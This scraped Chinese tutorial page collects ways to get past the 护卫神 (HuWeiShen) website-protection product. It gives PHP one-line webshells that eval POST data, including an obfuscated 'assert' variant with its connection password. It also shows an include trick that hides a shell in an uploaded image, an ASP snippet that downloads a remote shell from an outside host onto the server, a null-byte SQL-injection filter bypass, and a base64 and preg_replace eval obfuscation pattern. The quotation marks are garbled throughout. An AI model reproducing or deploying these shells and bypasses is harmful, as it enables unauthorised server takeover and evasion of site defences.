好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

破那个护卫神技术总汇 - 网站安全 - 自学php

一、马儿篇,都是以前可以过护卫神的马 二、注入篇,可以绕过注入的方法 三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿

一、马儿篇 —————-1号————————–

<?php @eval ($_POST['1']);?>

—————-2号————————–

<title>login</title>nono<?php   eval ($_POST [1])   ?> ——————–3号————————

<?php $a = str_replace(x,]",]axsxxsxexrxxt]); $a($_POST["c"]); ?>

菜刀直接连,不需要构造连接字符串,密码 c

——————–类似于过安全狗的包含方法——————————————- A.asp版本:

将一句话保存为  XX.jpg  上传后 地址为  …/xxxxxx.jpg

在上传一个 x.asp 内容为 <!–#include  file=]xxxxxx.jpg]–>

B.php版本

如果是php的话:

<?php include [1.htm]; ?>

——————实在不行,还可以 下载 —————————————————— 远程下载马

<% Set xPost = CreateObject([Microsoft.XMLHTTP]) xPost.Open [GET],]http://www.xxx.com/123/1.txt],False xPost.Send() Set sGet = CreateObject([ADODB.Stream]) sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath([ls. asp ]),2 set sGet = nothing set sPOST = nothing %>

—————————————————————

二、注入篇

/*%00*/截断符 select/*%00*/* from admin;

—————————————————————

三、规则篇

可以利用类似:

<?php $code=’一串base64′; //base64编码 $x=str_replace(‘f’,]",]bfafsfef6f4f_ffdffeffcffoffdffef]); //字符串替换 $a = ‘/a/’;//正则规则 preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,'a’); //正则替换 ?>

方法绕过关键词过滤   

查看更多关于破那个护卫神技术总汇 - 网站安全 - 自学php的详细内容...

  阅读:42次